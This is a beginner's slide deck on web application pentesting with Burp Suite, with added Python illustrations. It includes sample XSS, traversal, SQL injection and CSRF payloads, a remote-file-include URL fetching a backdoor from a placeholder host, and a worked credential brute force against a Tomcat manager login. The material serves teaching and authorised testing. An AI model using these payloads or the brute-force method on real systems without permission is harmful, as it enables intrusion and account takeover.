Web Hacking with Burp Suite 101

Posted on 15-Jan-2017


Introduction to Web App Pentesting & Burp Suite 101

Build | Protect | Learn

Agenda


• $whoami
• Overview of Web App Testing & Vulnerabilities
• Burp Suite Overview
• Getting Started With Burp Suite
• Automated Testing
• Manual Testing
• Other Features in Burp
• Manual Testing Mindset & Example
• Additional Web Hack Tips N Tricks
• Useful Resources & Conclusion


~$ whoami


• InfoSec Geek
• Pentester @ BreakPoint Labs (0xcc_labs)
• Contributor to Primal Security Blog and Podcast
• @b3armunch (Personal Infosec Twitter)
• Certification Enthusiast (OSCP, GWAPT, GPEN, etc.)
• I Love Knowing What's Going On (emerging vulns, tools, PoC), CTFs, Offensive Security Work, Football and Trying New Beers.


Full Disclosure!


• ALWAYS test what you're about to learn in a lab environment or where you have permission!

• What I cover isn’t everything, but it’s enough to hopefully get you familiar and started with using Burp Suite


I Promise NOOOOO…


Overview


• Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we leverage on every web assessment.

• Motivation: Burp Suite could be one of your foundation tools that you leverage throughout your entire web assessment.

- Burp provides manual and automated testing capabilities.
- Burp has a free and a paid (Professional) version, currently $349 per year.

• Quick Note: Static vs. Dynamic Web Content
- Static content: Informational web content that tends to lack user features and capabilities.
- Dynamic content: Content that allows user input to be passed to the server.


Web App Testing Methodologies


• Having an established testing methodology is an important first step.

• Create checklists and templates so the assessment process is repeatable and nothing gets skipped.

• Several great methodologies out there:
- Penetration Testing Execution Standard (PTES)
- OWASP Testing Guide (OTG) v4.0
- Web Application Hacker's Handbook task checklist

• Any great methodology will include both Automated and Manual testing.


Common Web Vulnerabilities


• Cross-Site Scripting (XSS): When an attacker can embed a script in a page so that it executes client-side (in the victim's web browser).

<script>alert("hello")</script>

• Directory Traversal: Used by an attacker to reach files and directories outside the web root that they should not be able to read.

index.php?q=../../../../../etc/passwd

• Cross-Site Request Forgery (CSRF): An attack that forces an end user to execute unwanted actions on a web application to which they are currently authenticated, e.g. by getting their browser to load:

http://testbank.com/transfer.php?acct=BadBob&amount=500

• Open Redirect: An application that takes a parameter and redirects the user to whatever that parameter holds, without validating it.

index.php?redirect=https://badboysite.com
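As an added example (not code from the slides), here is the handling behind the traversal and open-redirect parameters shown above, with a naive version beside a hardened one. The web root, the allow-listed host and the function names are assumptions for illustration; the same "stay under the web root" containment check is what stops a local file include from reading arbitrary files.

```python
# Added example, not code from the slides. WEBROOT, ALLOWED_HOSTS and the
# function names are assumptions for illustration.
import os
from pathlib import Path
from urllib.parse import urlsplit

WEBROOT = Path("/var/www/app/pages")   # assumed document root
ALLOWED_HOSTS = {"example-site.com"}    # assumed redirect allow-list


def naive_page_path(q):
    """Vulnerable: the 'index.php?q=' value is joined onto the web root and the
    OS collapses the '..' components, so '../../../../../etc/passwd' lands on
    /etc/passwd."""
    return os.path.normpath(os.path.join(str(WEBROOT), q))


def safe_page_path(q):
    """Hardened: normalise '..' and symlinks, then require the result to stay
    under WEBROOT. Raises ValueError on traversal."""
    if "\x00" in q:
        raise ValueError("null byte in path")
    base = WEBROOT.resolve()
    candidate = (base / q.lstrip("/")).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError("path escapes web root: %s" % candidate)
    return str(candidate)


def is_traversal(q):
    """True when the hardened check rejects the value."""
    try:
        safe_page_path(q)
    except ValueError:
        return True
    return False


def naive_redirect(target):
    """Vulnerable: whatever 'redirect=' holds becomes the Location header."""
    return target


def safe_redirect(target, default="/"):
    """Hardened: allow only a same-site absolute path or an allow-listed host.
    External hosts, scheme-relative '//evil', backslash tricks and
    javascript: all fall back to a fixed default."""
    if "\\" in target:
        return default
    parts = urlsplit(target)
    if (not parts.scheme and not parts.netloc
            and target.startswith("/") and not target.startswith("//")):
        return target                      # e.g. /contact/contact-us.php
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return default
```

Note that `safe_redirect` decides on the parsed host, not on a substring match: a check like `"example-site.com" in target` is bypassed by `https://example-site.com.badboysite.com/`.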


Common Web Vulnerabilities


• SQL Injection (SQLi): A form of code injection against data-driven applications, where a malicious SQL fragment entered in a form field or parameter value becomes part of the query the application executes.

username: admin'-- (Attempts to log you in as the admin user; the quote closes the string literal and -- comments out the rest of the query, including the password check.)

• Brute Force Attacks: A trial-and-error method used to obtain authentication to a web application (username, password, PIN, etc.).

• Remote File Inclusion (RFI): The ability to make the application include a file from an attacker-controlled server, through a vulnerable include routine in the app.

http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php

• Local File Inclusion (LFI): Occurs when the value passed to a page include is not properly validated, so an adversary can have the application include and serve a file already on the server.
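The admin'-- bypass from the slide, run against an in-memory SQLite table as an added example (not code from the slides). The table, its rows and the function names are constructed for illustration; the vulnerable login builds the query by string formatting, the safe one binds the input as a parameter.

```python
# Added example, not code from the slides: the admin'-- login bypass against
# an in-memory SQLite table. Table, rows and function names are constructed.
import sqlite3


def _users_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!Pass"), ("zack", "password")])
    return conn


def login_vulnerable(username, password):
    """String-built query. With username admin'-- the quote closes the
    literal and -- comments out the rest, so the password is never checked:
    SELECT username FROM users WHERE username = 'admin'--' AND password = 'x'
    Returns the username the database matched, or None."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = _users_db().execute(sql).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Parameterised query: the input is bound as data, so admin'-- is
    looked up literally as a username and matches nothing."""
    row = _users_db().execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None
```

The same idea is what to look for in Repeater: if admin'-- (or a true/false pair such as ' OR '1'='1 vs ' OR '1'='2) changes the response, the input is reaching the query unparameterised.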


Web App Testing Procedure


1) Scoping: Lay out the landscape through a questionnaire or conference call. (Always document it.)

2) Recon & Mapping: What is the size of the application and which technologies does it use? (Spidering, mapping and OSINT)

3) Automated Testing: Scan all the things! (Automated scanners plus open source testing tools)

4) Manual Testing: Enumerate areas of interest and validate the automated findings (abuse features, test injection points, weed out false positives).

5) Reporting: Essentially putting all your hard work into one document.

6) Remediation & Review: Provide support and re-test the findings once they have been remediated.


Burp Suite Overview


Often Burp will be leveraged for its interception proxy capabilities.

• Proxy: Intercept, capture and log requests
• Spider: Discover linked content
• Scanner: Active web app vulnerability scanner (Pro version)
• Intruder: Automate your testing through injection points
• Repeater: Take a request, manipulate it and analyze the response
• Sequencer: Analyze tokens (are they randomly generated?)
• Encoder/Decoder: Encode or decode strings (URL, Base64, HTML)
• Comparer: Take two things and compare them side by side
• Extender: TONS of extensions to expand the features in Burp


• So Enough Talk….Let’s Actually Learn How to Use Burp!

Let’s Begin


Launching Burp

• Burp Suite is a Java jar file that can either be double clicked or run from the CLI. The following syntax launches Burp with a 1 GB heap (the JVM option goes before -jar, which takes the jar path as its next argument):

java -Xmx1024m -jar burpsuite.jar


Burp's Proxy

• Burp's proxy is an intercepting proxy server that operates as a man-in-the-middle between your browser and the target web application.


Setting Up Your Browser


Burp's Proxy Settings


Common Issue….


Define Your Scope


Map Your App (Click through)

• Understand the app's purpose

• What Features are allowed?

• Can you sign in?

• View the Source

• Observe the file and directory structure

• What technologies are in use? (Wappalyzer)

• Is information being displayed that I can control?

• Does the app appear to interact with a database?


Spider (Linked Content)


Building Your Site Map

The Site Map tree view contains a hierarchical representation of content, with URLs broken down into domains, directories, files and parameterized requests.


Spider (Linked Content)


Filter Content In Your Site Map


Filtering Can Lead to…

• Client side comments (Easter eggs the developer left behind!)

• Email addresses (potentially leveraged for logins)

• Internal Path Disclosure

• Unlinked Files or Paths

• Potentially usernames and passwords (not very likely)

• Technology Enumeration
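The same filtering applied to a single captured response, as an added example (not code from the slides): a handful of regexes that pull out the items listed above. The response headers and body below are constructed for illustration, and the patterns are a starting point rather than an exhaustive set.

```python
# Added example, not code from the slides: "filter your site map" applied to
# one captured response. Headers and body are constructed for illustration.
import re

SAMPLE_HEADERS = {  # constructed
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10",
    "Content-Type": "text/html",
}
SAMPLE_BODY = """<!-- TODO: remove /old-admin/ before go-live -->
<html><head><script src="/static/jquery-1.8.3.min.js"></script></head>
<body><a href="/contact/contact-us.php">Contact</a>
<p>Report problems to webmaster@example-site.com</p>
<!-- Warning: include failed in /var/www/app/includes/db.php on line 12 -->
</body></html>"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Windows drive paths or common *nix roots: internal path disclosure
OS_PATH_RE = re.compile(r"(?:[A-Za-z]:\\|/(?:var|home|usr|opt|etc|inetpub))[\w./\\-]+")
LINK_RE = re.compile(r"""(?:href|src|action)=["']([^"']+)["']""", re.I)
# URL-style paths mentioned in free text (not preceded by a scheme or word)
URL_PATH_RE = re.compile(r"(?<![\w:/])/[\w.-]+(?:/[\w.-]*)*")
TECH_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")


def grep_response(headers, body):
    """Pull the slide's list out of one response: developer comments, e-mail
    addresses, internal paths, linked resources and technology banners, plus
    paths that only appear in comments (candidates for unlinked content)."""
    comments = [c.strip() for c in COMMENT_RE.findall(body)]
    links = set(LINK_RE.findall(body))
    in_comments = set()
    for c in comments:
        in_comments.update(URL_PATH_RE.findall(c))
    return {
        "comments": comments,
        "emails": sorted(set(EMAIL_RE.findall(body))),
        "internal_paths": sorted(set(OS_PATH_RE.findall(body))),
        "links": sorted(links),
        "unlinked_candidates": sorted(in_comments - links),
        "technologies": sorted(v for k, v in headers.items()
                               if k.lower() in TECH_HEADERS),
    }


if __name__ == "__main__":
    for key, value in grep_response(SAMPLE_HEADERS, SAMPLE_BODY).items():
        print("%-20s %s" % (key, value))
```

Anything under "unlinked_candidates" goes into the site map by hand (or into an Intruder list for the discovery step later on); the version strings under "technologies" feed the version-specific vulnerability research.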


Analyze Your Target


Target Analyzer Summary

Static Content: Essentially content that could be considered "flat files", meaning what you see is what you get! Often static content is used to present end users news or information.

Dynamic Content: Allows for user interaction and communicates with "back end" or "server-side" code that handles the request. Think of a search engine or login form.


HTTP History & Comments


Automated Testing


Automated Testing


Automated Testing Will Miss Stuff

• The DHS NCATS team reported that 67% of high-impact vulnerabilities required manual testing to identify.


Automated Testing Can Break Stuff


Automated Testing Can Take a Long Time


Automated Testing Can Have False Positives

• Burp: Right-Click -> [Send to Repeater] [Request in Browser]


Burp's Automated Scan Wizard


Burp's Automated Scan Queue


Burp's Automated Scan Results


Generate a Burp Scan Report


Burp Automated Scan Report

• The Burp Scanner report will include: issue details, severity, confidence, request, response, etc.


Manual Testing


Some Things To Think About

• What technology is in use?
• Ensure that you properly mapped the application
• Enumerate all technology features (file upload, comments, etc.)
• Enumerate all areas of user input, your "injection points"
• Can you figure out what is being done with your input?
• Is your input being presented on the screen? -> XSS
• Is your input used to look up stored data? -> SQLi
• Does your input make the server contact an external service? -> SSRF
• Does your input select a local or remote file? -> File Inclusion
• Does your input end up on the file system? -> File Upload
• Think OWASP Top Ten…


OWASP Top Ten Snap Shot

Source: https://www.owasp.org/index.php/Top_10_2013-Top_10


Analyze Scan Results > Repeater (1)


Test, Modify & Repeat


Analyze Scan Results > Repeater (2)


Verify Results (XSS Example - False Positive)


Verify Results (XSS Example -Successful)
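The false-positive versus successful distinction on these two slides comes down to how the payload comes back in the response. As an added example (not code from the slides), here is a small triage helper for a Repeater response: both response bodies are constructed for illustration, and the payload is the one from the XSS slide.

```python
# Added example, not code from the slides: triage a scanner's XSS finding by
# checking how the payload is reflected. Both bodies are constructed.
import html
import json

PAYLOAD = '<script>alert("hello")</script>'

# constructed: search page that echoes the query into the page unchanged
VULNERABLE_BODY = ('<html><body><p>Results for: '
                   '<script>alert("hello")</script></p></body></html>')
# constructed: same page with output encoding applied (scanner false positive)
ENCODED_BODY = ('<html><body><p>Results for: '
                + html.escape(PAYLOAD, quote=True) + '</p></body></html>')


def classify_reflection(body, payload):
    """Where, if anywhere, does the payload land in the response?
    'raw': back verbatim, go confirm it in a browser ("Request in Browser").
    'html-encoded' / 'js-escaped': the scanner matched on text the browser
    will render, not execute. 'absent': not reflected at all."""
    if payload in body:
        return "raw"
    if (html.escape(payload, quote=True) in body
            or html.escape(payload, quote=False) in body):
        return "html-encoded"
    if json.dumps(payload)[1:-1] in body:
        return "js-escaped"
    return "absent"


def reflection_contexts(body, payload):
    """For each raw reflection, a rough guess at the sink context: inside a
    <script> block, inside a tag attribute, or plain text between tags.
    The context decides which payload actually executes."""
    contexts = []
    start = 0
    while True:
        i = body.find(payload, start)
        if i < 0:
            break
        before = body[:i]
        if before.count("<script") > before.count("</script"):
            contexts.append("script")
        elif before.rfind("<") > before.rfind(">"):
            contexts.append("attribute")
        else:
            contexts.append("text")
        start = i + len(payload)
    return contexts
```

A raw reflection inside an attribute or a script block is still exploitable, but not with the plain `<script>` payload; that is where the manual step (closing the attribute or string first) earns its keep.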


Think About How Input Is Being Used

Think about how you would attack the following parameters and their values:

http://example-site.com/index.php?redirect=/contact/contact-us.php

http://example-site.com/index.php?file=/app/load.php

http://example-site.com/index.php?name=zack

http://example-site.com/index.php?search=exploitdb

http://example-site.com/index.php?sql=SELECT * FROM USERS


Burp's Intruder


Custom Fuzzing

• FuzzDB, RAFT lists and SecLists provide great lists for custom fuzzing.
• As you start to understand how your input is being used you can start your fuzzing in an automated manner.
• Burp Suite Pro's Intruder is my go to tool for web application fuzzing.


Unlinked Content Treasures!

• Use Burp's pre-built payload lists for fuzzing (Intruder, Pro version only)

• Use commonly known lists from tools like DirBuster or Wfuzz (we can have Burp add any new findings to our site map!)

• Use the "SecLists" collection and its lists, broken down as follows:
- Passwords
- Usernames
- Discovery (collection of general and specific directories/resources)
- Fuzzing (collection of various payloads sorted by attack type)
- Miscellaneous (common ports, file extensions, list of US cities, etc.)
- Pattern Matching (good for grepping through file contents)
- IOCs (indicators of compromise: malicious domains, IPs, files, etc.)
- New Feature: RobotsDisallowed (disallowed directories from the robots.txt files of the world's top websites, specifically the Alexa 100K)

^ Source: https://github.com/danielmiessler/SecLists


Define Your Intruder Attack Type

• Sniper – One payload set. Each marked position is fuzzed in turn with every payload while the other positions keep their original values (positions × payloads requests). Good for testing one parameter at a time.

• Battering Ram – One payload set. The same payload is placed into all marked positions at once, so the request count equals the list length (e.g. username and password both set to the same guess).

• Pitchfork – One payload set per position, walked in parallel: request N uses item N from every list (credential pairs that belong together). Stops at the end of the shortest list.

• Cluster Bomb – One payload set per position; every combination of payloads is sent, so the count is the product of the list lengths. (WARNING: this is usually the largest and longest-running attack type.)
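The four attack types reproduced as generators over a two-position login request, as an added example (not code from the slides or from Burp). The base request, the two payload lists and the request counts are constructed for illustration; the point is to see exactly which requests each type produces before you pick one.

```python
# Added example, not code from the slides or from Burp: the four Intruder
# attack types as generators over a two-position login request.
# BASE, USERS and PASSWORDS are constructed for illustration.
import itertools
from urllib.parse import urlencode

BASE = {"username": "admin", "password": "password"}      # two § positions
USERS = ["admin", "tomcat", "root"]                        # payload set 1
PASSWORDS = ["password", "tomcat", "admin", "Summer2016"]  # payload set 2


def sniper(base, payloads):
    """One payload set; each position is fuzzed in turn while the others
    keep their base value -> positions * payloads requests."""
    out = []
    for pos in base:
        for p in payloads:
            req = dict(base)
            req[pos] = p
            out.append(req)
    return out


def battering_ram(base, payloads):
    """One payload set; the same payload goes into every position at once
    -> len(payloads) requests (username == password guesses)."""
    return [{pos: p for pos in base} for p in payloads]


def pitchfork(base, sets):
    """One set per position, walked in parallel: request i takes item i
    from each set -> min(len) requests (credential pairs, not combos)."""
    cols = [sets[pos] for pos in base]
    return [dict(zip(base, combo)) for combo in zip(*cols)]


def cluster_bomb(base, sets):
    """One set per position, every combination -> product of lengths.
    Largest and slowest of the four; think before aiming it at production."""
    cols = [sets[pos] for pos in base]
    return [dict(zip(base, combo)) for combo in itertools.product(*cols)]


def render(req, path="/login.php", host="example-site.com"):
    """Turn one request dict into the raw POST Intruder would send."""
    body = urlencode(req)
    return ("POST %s HTTP/1.1\r\nHost: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n%s" % (path, host, len(body), body))


if __name__ == "__main__":
    sets = {"username": USERS, "password": PASSWORDS}
    for name, reqs in (("sniper", sniper(BASE, USERS)),
                       ("battering ram", battering_ram(BASE, USERS)),
                       ("pitchfork", pitchfork(BASE, sets)),
                       ("cluster bomb", cluster_bomb(BASE, sets))):
        print("%-13s %2d requests, first: %s" % (name, len(reqs), urlencode(reqs[0])))
```

With three usernames and four passwords that is 6, 3, 3 and 12 requests respectively; scale the lists to a few thousand entries and the difference between pitchfork and cluster bomb is what decides whether the attack finishes today.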


Burp's Intruder: Set Your Position


Define the Intruder Payload List


Intruder's Results (Status | Length)

Note: You may want to uncheck payload URL-encoding if it is not needed! Intruder URL-encodes characters such as = in payloads by default, which corrupts a Base64-encoded value.


Burp Pro’s Discover Content (Unlinked)


Burp's Discover Content Options


Burp's Discover Content Session Status


Other Features in Burp…


Burp's Encoder/Decoder


Burp's Comparer

Key: Modified | Deleted | Added


Burp's Sequencer


Burp's Extender


Manual Testing Mindset & Example

• Now let's cover a basic example of how we can compromise a web application through several features that we can abuse!


Weak Authentication Mechanism

• Very common finding in web application penetration testing
• Often a combination of several low-severity issues:
- Username enumeration (Low) +
- Lack of automation controls (Low) +
- Lack of password complexity requirements (Low) =
- Account compromise (Critical)


Weak Authentication: Username Enumeration

• Password reset features: "Email address not found"
• Login error messages: "Invalid Username"
• Timing of login attempts: valid user = 0.4 secs, invalid user = 15 secs
• User registration: "Username already exists"
• Various error messages and HTML source
• Contact Us features: "Which admin do you want to contact?"
• Google hacking and OSINT
• Document metadata
• Sometimes the application just tells you!


Weak Authentication: Automation Controls

• Pull the authentication request up in Burp's Repeater and try it a few times.

• If you see no sign of automation controls, send it to Burp's Intruder for more aggressive testing. Look for:
- No account lockout
- No/weak CAPTCHA
- Main login is strong, but other resources are not (mobile interface, API, etc.)


Weak Authentication: Weak Passwords

• We as humans are bad at passwords…here are some tricks that work for me:
- Password the same as the username
- Variations of "password": "p@ssw0rd"…
- Month+Year, Season+Year: summer2016…
- Company name + year
- Keyboard walks – PW generator: "!QAZ2wsx"
- My favorites…Burp Pro's built-in wordlist or the SecLists password files

• Lots of wordlists out there; consider making a targeted wordlist using CeWL (scrape sites for unique keywords).

• Research the targeted user's interests and build lists around those interests.


Piecing Together What We Know…

• We have enumerated that there is a valid account named "tomcat" via the password reset functionality of the forms-based login (also a default account for Apache Tomcat).

• The application also has basic authentication protecting its Tomcat Manager login on port 8080 (no lockout built in; the username:password payloads will need to be Base64-encoded).

• We know there is a lack of password complexity, since we were able to create a test account with a password of "password" (create account feature abuse).

• Let's leverage Burp's Intruder to brute force…


Manipulating Our Target Request

1. View our HTTP History under the Proxy tab.
2. Find our HTTP request for the Tomcat '/manager/html' login resource.
3. Send our request to Burp's Intruder.


Burp Intruder Payload Configuration

4. Add the § payload markers § around the Basic Authorization value and select the Sniper attack type.


Analyze Your Encoded Payload

To provide further context, let's decode our sample login attempt to the Tomcat login: send the Authorization value to Burp's Decoder > Base64 decode, and we can see our attempt in plaintext.

(i.e.) tomcat:password


Burp Intruder Payload Set Up

5. Payload type: Custom iterator; set Position 1 to the username list
6. Set the Position 1 separator to ":"
7. Set Position 2 to the password list


Payload Processing Base64 Encode

8. Add a payload processing rule > Encode > Base64-encode, so each username:password attempt is submitted in the format Basic auth expects!


Start Intruder & Review Results

9. Look for a variance in the HTTP status or response length across your payload attempts.
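Steps 4 to 9 as a script, added here as an example and not code from the slides: the custom iterator joins username, ":" and password, the processing rule Base64-encodes the result, and the review step flags the attempt whose status or length differs from the rest. The target is a constructed stand-in for the Tomcat manager (no real host is contacted), and the user and password lists are assumptions.

```python
# Added example, not code from the slides: Intruder steps 4-9 for Basic auth.
# fake_manager is a constructed stand-in for the target; USERS and PASSWORDS
# are assumptions for illustration.
import base64
from collections import Counter

USERS = ["tomcat", "admin"]                             # position 1
PASSWORDS = ["admin", "tomcat", "s3cret", "password"]  # position 2


def custom_iterator(users, passwords, separator=":"):
    """Intruder custom iterator: every position-1 item, the separator, every
    position-2 item, e.g. 'tomcat:password'."""
    for user in users:
        for pw in passwords:
            yield user + separator + pw


def encode_payload(creds):
    """Payload processing rule 'Base64-encode'. Leave Intruder's URL encoding
    off for this payload: turning '=' padding into %3D corrupts the header."""
    return base64.b64encode(creds.encode()).decode()


def decode_payload(token):
    """What Burp's Decoder shows for a captured Authorization value."""
    return base64.b64decode(token).decode()


def build_request(token):
    return ("GET /manager/html HTTP/1.1\r\n"
            "Host: vulnhost.com:8080\r\n"
            "Authorization: Basic %s\r\n\r\n" % token)


def fake_manager(request):
    """Constructed stand-in for the target: 401 for anything except the one
    valid credential, 200 with the manager page for tomcat:password."""
    auth = [l for l in request.split("\r\n") if l.startswith("Authorization: Basic ")][0]
    creds = decode_payload(auth.split(" ")[2])
    if creds == "tomcat:password":
        body = "<html><title>/manager</title><h1>Tomcat Web Application Manager</h1></html>"
        return 200, len(body)
    body = "<html><h1>401 Unauthorized</h1></html>"
    return 401, len(body)


def run_attack(users, passwords, target=fake_manager):
    """Sniper attack over the single Authorization position: one request per
    iterator output, recording status and length like Intruder's table."""
    results = []
    for creds in custom_iterator(users, passwords):
        token = encode_payload(creds)
        status, length = target(build_request(token))
        results.append({"creds": creds, "payload": token,
                        "status": status, "length": length})
    return results


def outliers(results):
    """Step 9: whatever differs from the majority (status, length) pair is
    the row worth decoding and trying by hand."""
    common = Counter((r["status"], r["length"]) for r in results).most_common(1)[0][0]
    return [r for r in results if (r["status"], r["length"]) != common]


if __name__ == "__main__":
    for hit in outliers(run_attack(USERS, PASSWORDS)):
        print(hit["status"], hit["length"], hit["payload"], "->", hit["creds"])
```

Against a real Tomcat the outlier is not always a 200: a valid account that lacks the manager-gui role comes back as 403, which is still a different status from the 401 everything else gets and still a credential worth noting.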


ACHIEVEMENT UNLOCKED!!!!


Additional Web Hack Tips N Tricks


Reconnaissance: Identify New Systems and Content

• Companies are normally quite surprised about what is exposed to the Internet.

• How do you tackle large /8s and /16s? How do you even build out this footprint starting with a company name?
- Shodan + Censys.io (3rd party DBs with port/service info)
- Domain + IP research (host, dig, whois, etc.)
- Masscan + Nmap (identify open ports and services)
- WhatWeb + Wappalyzer (ID the tech stack)
- Google, Bing, etc. (search syntax)
- OSINT: company mergers + acquisitions (expand scope?)


Big Scope? Quick Visual: EyeWitness

• EyeWitness is a tool that takes in URLs and creates a report with server headers + a screenshot of the web GUI

• Extremely useful when facing a large scope


Don't Judge a System By Its IP

• Requesting an application by IP might give back different content than requesting it by domain name.

• Load balancing could mean an application is mirrored across several IP addresses (commonly seen with large sites, i.e. banks).

• Keep in mind you can have several applications living on the same IP (virtual hosting).

• Pointing an automated tool at "http://ip/" may miss a lot vs. "http://ip/AppIsHere/".


Shot in The Dark "Nikto" Scan

• Open source web application vulnerability scanner that checks for low hanging fruit and some old goodies. (False positives will happen!)


Version Specific Vulnerabilities

• Enumerating the technology and version in use goes a long way toward finding vulnerabilities (Google + Exploit-DB)

• What do I know about the technology and how can I find more information?


Build Your Own Custom Report

• We leverage Markdown for custom reporting to deliver our reports in HTML format. Common Findings Database - Check it out


Useful Resources

• CTFs: Vulnhub, Past CTF Writeups, Pentester Lab
• Training: GWAPT, Offensive Security
• Book: Web Application Hacker's Handbook
• Talk: How to Shot Web - Jason Haddix
• Talk: How to be an InfoSec Geek - Primal Security
• Talk: File in the hole! - Soroush Dalili
• Talk: Polyglot Payloads in Practice - Marcus Niemietz
• Talk: Running Away From Security - Micah Hoffman
• GitHub Resource: Security Lists For Fun & Profit

• BPL Blog Post on this Talk:


Conclusion

Email: zmeyers@breakpoint-labs.com

• Burp Suite is a great baseline tool to leverage in all your future web assessments.

• OWASP has a large abundance of information to reference and learn from.

• Read blogs and Twitter whenever possible; dozens of web vulnerabilities and potential exploits are released every day.
